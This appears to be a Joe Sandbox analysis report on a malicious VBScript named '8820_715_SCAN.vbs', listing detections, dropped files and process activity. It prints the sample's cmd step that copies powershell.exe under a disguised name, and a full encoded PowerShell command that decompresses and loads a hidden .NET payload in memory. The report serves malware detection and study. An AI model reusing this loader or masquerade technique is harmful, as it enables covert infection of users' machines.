Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
8820_715_SCAN.vbs8%ReversingLabs
8820_715_SCAN.vbs15%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Desktop\8820_715_SCAN.vbs.exe0%ReversingLabs
C:\Users\user\Desktop\8820_715_SCAN.vbs.exe0%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exe8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://crl.micro8820_715_SCAN.vbs.exe, 00000004.00000002.2119934814.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      http://pesterbdd.com/images/Pester.png8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000005033000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://aka.ms/pscore6lB8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.html8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000005033000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://github.com/Pester/Pester8820_715_SCAN.vbs.exe, 00000004.00000002.2101400946.0000000005033000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://nuget.org/nuget.exe8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/License8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Icon8820_715_SCAN.vbs.exe, 00000004.00000002.2108666632.0000000005F46000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        No contacted IP infos

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1572138
                        Start date and time:2024-12-10 07:15:58 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 38s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:8820_715_SCAN.vbs
                        Detection:MAL
                        Classification:mal96.bank.evad.winVBS@6/5@0/0
                        EGA Information:Failed
                        HCA Information:
                        • Successful, ratio: 90%
                        • Number of executed functions: 50
                        • Number of non-executed functions: 7
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Execution Graph export aborted for target 8820_715_SCAN.vbs.exe, PID 6536 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        01:16:53API Interceptor8x Sleep call for process: 8820_715_SCAN.vbs.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASNs

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\Desktop\8820_715_SCAN.vbs.exePaymentAdvice-1629043.vbsGet hashmaliciousNeshtaBrowse
                          FileCopy.vbsGet hashmaliciousUnknownBrowse
                            Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                              Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                GRAINS.vbsGet hashmaliciousAgentTeslaBrowse
                                  PRODUCT-PICTURE.batGet hashmaliciousAgentTeslaBrowse
                                    Fattura-24SC-99245969925904728562.vbsGet hashmaliciousDiscord Token StealerBrowse
                                      ilZhNx3JAc.batGet hashmaliciousAgentTeslaBrowse
                                        87M9Y3P4Z7.batGet hashmaliciousAgentTeslaBrowse
                                          ip4.cmdGet hashmaliciousUnknownBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8820_715_SCAN.vbs.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\8820_715_SCAN.vbs.exe
                                            File Type:CSV text
                                            Category:dropped
                                            Size (bytes):3475
                                            Entropy (8bit):5.355534067687663
                                            Encrypted:false
                                            SSDEEP:96:iqlYqh3o9CgPtI6eqzNqMRxEi+fr0LqU57UMq4yIIVMDDqFhMFa:iqlYqh3ytI6eqzNqMXEnEqU57tqvIIVX
                                            MD5:6C0267B42C04F934E155D94E017F5627
                                            SHA1:5833E7EDD36227841632E8E5CBB998639891FD7E
                                            SHA-256:6414237E2D209E63E86D18CC1C2F7335CB7B6128046AB758106A24F9A5F9FD56
                                            SHA-512:549A311C8D821B92C8CDA190EBAC3232CD8CD1D625D7CDC3EFEE8E3F7ECFE06CF3A39EE64BD651396963294B45D32209A483283FBECBFF361554553E4C445C0F
                                            Malicious:true
                                            Reputation:low
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\bc6fa6cbc82ba7e8e7f31ce87cd85b5f\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\7ae6ae69c7471e5e034a046629402c6a\System.Management.Automation.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f1

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Users\user\Desktop\8820_715_SCAN.vbs.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1364
                                            Entropy (8bit):5.415429923112281
                                            Encrypted:false
                                            SSDEEP:24:31uYWSKco4KmZjKbmOIKod6emN1s4RPQoU99tXt/NK3R88bJ0yiaEW3bS:7WSU4xympjms4RIoU99tlNWR83yqabS
                                            MD5:5B1A5B039281F07B05A3C0A4F2FC4A6C
                                            SHA1:41749007B8FE89E752E10D2A480CEA6F5DFDE0A4
                                            SHA-256:E276BD3F6F1AF1E81AAE2092D63653853BDEDDE058299F9AD47F853A7BDE6E2A
                                            SHA-512:551CDA79E8FD2CAE818D102246F8F5F1C5084CBC71B4EFFA2B3C5CDD4EBA3F9614706089C34C438160857C271F1C67AE467C15B640626CB4BBDC8E154F2D89C6
                                            Malicious:false
                                            Reputation:low
                                            Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qljaljk.p4c.ps1

                                            Download File
                                            Process:C:\Users\user\Desktop\8820_715_SCAN.vbs.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jisyuc2.iuq.psm1

                                            Download File
                                            Process:C:\Users\user\Desktop\8820_715_SCAN.vbs.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\Desktop\8820_715_SCAN.vbs.exe

                                            Download File
                                            Process:C:\Windows\System32\cmd.exe
                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):433152
                                            Entropy (8bit):5.502549953174867
                                            Encrypted:false
                                            SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                            MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                            SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                            SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                            Joe Sandbox View:
                                            • Filename: PaymentAdvice-1629043.vbs, Detection: malicious, Browse
                                            • Filename: FileCopy.vbs, Detection: malicious, Browse
                                            • Filename: Pyyidau.vbs, Detection: malicious, Browse
                                            • Filename: Pyyidau.vbs, Detection: malicious, Browse
                                            • Filename: GRAINS.vbs, Detection: malicious, Browse
                                            • Filename: PRODUCT-PICTURE.bat, Detection: malicious, Browse
                                            • Filename: Fattura-24SC-99245969925904728562.vbs, Detection: malicious, Browse
                                            • Filename: ilZhNx3JAc.bat, Detection: malicious, Browse
                                            • Filename: 87M9Y3P4Z7.bat, Detection: malicious, Browse
                                            • Filename: ip4.cmd, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:ASCII text, with very long lines (65536), with no line terminators
                                            Entropy (8bit):6.273149510524195
                                            TrID:
                                              File name:8820_715_SCAN.vbs
                                              File size:2'614'358 bytes
                                              MD5:cbcdb57b4360abb35507b88bb5a7f2d7
                                              SHA1:19d041d281f38b9c86542e0735037acf2638e860
                                              SHA256:c8d8bf862a30647af9bf71da29e8c4aa74bdf383b6fbb6806227195b988923f9
                                              SHA512:0ddf2d70562665fdb4043c8880308b841bf848e9d9e53848cc7ed6fcd777f9c6db448955ed8465fd7d653bf7c0263d2b2ec08ec7ee88fafb64be125874d7eec2
                                              SSDEEP:49152:4TVhkz7JZu10tacex1fAL+48gzxbjfgp3AcV3/tZ5:r0
                                              TLSH:BEC512621E34ED887BD421397EAC3660D3E0EF772CB796505253EB8E172A9411B21FB1
                                              File Content Preview:REM q0Ybwjq8eDuOu3ZyTRtlWX22n+sE401t1QuD3AuFqIbHwzuzDrim5v/W1pgocXTkPW0aTed5gsj4rewvOJwwCRLvq4rfskrED7nrLgy1RWSWnp6dalueTkFzumDMd61jps2FOcXqBIojVT0ujVO7Q2iHmJn9kp63UF1JbPfq+JgLiIc/LwyfrJkTehQdcMDtt3f3Rd8TZRMuzuhooJiTOF2lIwXLfBNc6Ov/6ReKmuCcW7R/8rO49yJ0EGE

                                              File Icon

                                              Icon Hash:68d69b8f86ab9a86

                                              Network Behavior

                                              No network behavior found

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:01:16:49
                                              Start date:10/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8820_715_SCAN.vbs"
                                              Imagebase:0x7ff7877e0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:01:16:50
                                              Start date:10/12/2024
                                              Path:C:\Windows\System32\cmd.exe
                                              Wow64 process (32bit):false
                                              Commandline:cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" /Y
                                              Imagebase:0x7ff72fd90000
                                              File size:289'792 bytes
                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:01:16:50
                                              Start date:10/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:01:16:53
                                              Start date:10/12/2024
                                              Path:C:\Users\user\Desktop\8820_715_SCAN.vbs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\8820_715_SCAN.vbs.exe" -enc JABJAGcAbwB0AGYAbwBhAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAQgB1AHAAbABzAHMAZgBnAGMAegAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEkAZwBvAHQAZgBvAGEAYwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABVAGMAagBxAHkAdQBlAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgB1AHAAbABzAHMAZgBnAGMAegAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAVQBjAGoAcQB5AHUAZQBlACAAKQA7ACQAQwB1AG0AYQBxAHkAagBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABHAHUAegBwAGIAZwBwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZABtAHQAcQBxAHYAdwBtAGoALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEcAdQB6AHAAYgBnAHAALgBDAG8AcAB5AFQAbwAoACAAJABDAHUAbQBhAHEAeQBqAG0AIAApADsAJABHAHUAegBwAGIAZwBwAC4AQwBsAG8AcwBlACgAKQA7ACQAQwBkAG0AdABxAHEAdgB3AG0AagAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFUAYwBqAHEAeQB1AGUAZQAgAD0AIAAkAEMAdQBtAGEAcQB5AGoAbQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAVQBjAGoAcQB5AHUAZQBlACkAOwAgACQARQB6AHgAcABnAHoAbgBoAHYAegBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAF0AOgA6AEcAZQB0AEQAbwBtAGEAaQBuACgAKQAuAEwAbwBhAGQAKAAkAFUAYwBqAHEAeQB1AGUAZQApADsAIAAkAEQAcwBwAHcAdAAgAD0AIAAkAEUAegB4AHAAZwB6AG4AaAB2AHoAagAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAcwBwAHcAdAAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABzAHAAdwB0AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
                                              Imagebase:0x650000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              • Detection: 0%, Virustotal, Browse
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:01:16:53
                                              Start date:10/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 079400F0 Relevance: 15.6, Strings: 12, Instructions: 562COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2120957302.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7940000_8820_715_SCAN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$`B_k$$]q$$]q$$]q
                                                • API String ID: 0-2456952220
                                                • Opcode ID: 2203c94d8b6bf49b86ce4ced83af377d585c67c5e1f74a88e0138ebd028c983a
                                                • Instruction ID: e132be4e15376cfdc4fbed30fb7aef4453842a749ebe6793692a7e60c60cb558
                                                • Opcode Fuzzy Hash: 2203c94d8b6bf49b86ce4ced83af377d585c67c5e1f74a88e0138ebd028c983a
                                                • Instruction Fuzzy Hash: B7025CB1B04306CFCB159B7C8800A6ABBE5EFC2218F1484FBDA45CB252DB35C946C792
                                                Function 07940CF8 Relevance: 12.8, Strings: 10, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2120957302.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7940000_8820_715_SCAN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                • API String ID: 0-267665775
                                                • Opcode ID: 46080e3fde4c07c60a5e6dcfd8ccdbc5766868f0e410ee02c2c030b76572410f
                                                • Instruction ID: 6afe94febd810f88f650e94d41ecc6e2feafc114f05ef97869235968fe63624e
                                                • Opcode Fuzzy Hash: 46080e3fde4c07c60a5e6dcfd8ccdbc5766868f0e410ee02c2c030b76572410f
                                                • Instruction Fuzzy Hash: 5AA13AB170430A8FDB259F2C8451A7B7BF9AF81208F1488FBCA45CB251DB35D855C7A2
                                                Function 079449C8 Relevance: 11.9, Strings: 9, Instructions: 684COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2120957302.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7940000_8820_715_SCAN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T]k$0U]q$4']q$4']q$4']q$4']q$DU]k$XYml$XYml
                                                • API String ID: 0-2488904270
                                                • Opcode ID: 2cdbce7278caf846e90f1116f197d1555ea5b45a7353000f8d134ee078048522
                                                • Instruction ID: 47f1577b2e8452556afb397c8db8d4177730e558418e28ce8928331b21a5ca35
                                                • Opcode Fuzzy Hash: 2cdbce7278caf846e90f1116f197d1555ea5b45a7353000f8d134ee078048522
                                                • Instruction Fuzzy Hash: 25325BB1B043868FCB158FAC9440B6ABBFAEFC6219F15C4BAC505CB261DA31DC41C7A1
                                                Function 07941425 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2120957302.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7940000_8820_715_SCAN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te]q$XX]q$XX]q$XX]q$XX]q
                                                • API String ID: 0-2750394778
                                                • Opcode ID: 767d5ad39fb4e1979734ae1185dd0a0d179d11fcef067ef8c2498c887f2023bd
                                                • Instruction ID: 863aa3e43c424bf2c0c06bf5a8806ad7011a7e3bdbd1c173b65ef274407f9cb0
                                                • Opcode Fuzzy Hash: 767d5ad39fb4e1979734ae1185dd0a0d179d11fcef067ef8c2498c887f2023bd
                                                • Instruction Fuzzy Hash: 4B518CB07A020A9FDB145B398451FBA77DB9F81708F248429D802CF2D1EF75D981C765
                                                Function 0794281A Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2120957302.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7940000_8820_715_SCAN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                • API String ID: 0-2353078639
                                                • Opcode ID: 9bd51814b50c9cb82a28d43f5dbbc2fae23ba694e89a4063cb3d5b3b76fe1754
                                                • Instruction ID: 86cd3e8f856f5715c781d38fdf5b8d3bc2f1ce2a684ee750ed9b11657d086455
                                                • Opcode Fuzzy Hash: 9bd51814b50c9cb82a28d43f5dbbc2fae23ba694e89a4063cb3d5b3b76fe1754
                                                • Instruction Fuzzy Hash: 7041F1B5700209ABDB288F18D990AAD77A9FF41224F248866F8558B351DB31D941CBA0
                                                Function 079441D0 Relevance: 5.7, Strings: 4, Instructions: 654COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2120957302.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7940000_8820_715_SCAN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q$4']q$4']q
                                                • API String ID: 0-1785108022
                                                • Opcode ID: e0175c0b63ebcec6e59e2b4e547bf42a58d23cec386e7e786d52c92aa6deee3d
                                                • Instruction ID: bc84d26629ef4b7ca43c8bedd40b9673866ae42e6dd28169c3be7d2a84453380
                                                • Opcode Fuzzy Hash: e0175c0b63ebcec6e59e2b4e547bf42a58d23cec386e7e786d52c92aa6deee3d
                                                • Instruction Fuzzy Hash: E5226AB17043828FDB158F688511B7ABBEADFC1718F14847AD805DB261DB75DC42CBA2
                                                Function 07940CD8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2120957302.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7940000_8820_715_SCAN.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$$]q$$]q
                                                • API String ID: 0-3019551829
                                                • Opcode ID: d971ac89ef3a9c3af7593c15b2559410c2fc7a4cd91c0a9e4725df95b16d532b
                                                • Instruction ID: c017a03437e169bdcbf2ed9d77ef49824b69b8587f900f620f2134f540e0a3aa
                                                • Opcode Fuzzy Hash: d971ac89ef3a9c3af7593c15b2559410c2fc7a4cd91c0a9e4725df95b16d532b
                                                • Instruction Fuzzy Hash: 973138B061430A8FDF354F288841F7B7BB59F42208F1548EACE00CB152D776E995C7A5
                                                Function 079405B4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2120957302.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                Joe Sandbox IDA Plugin
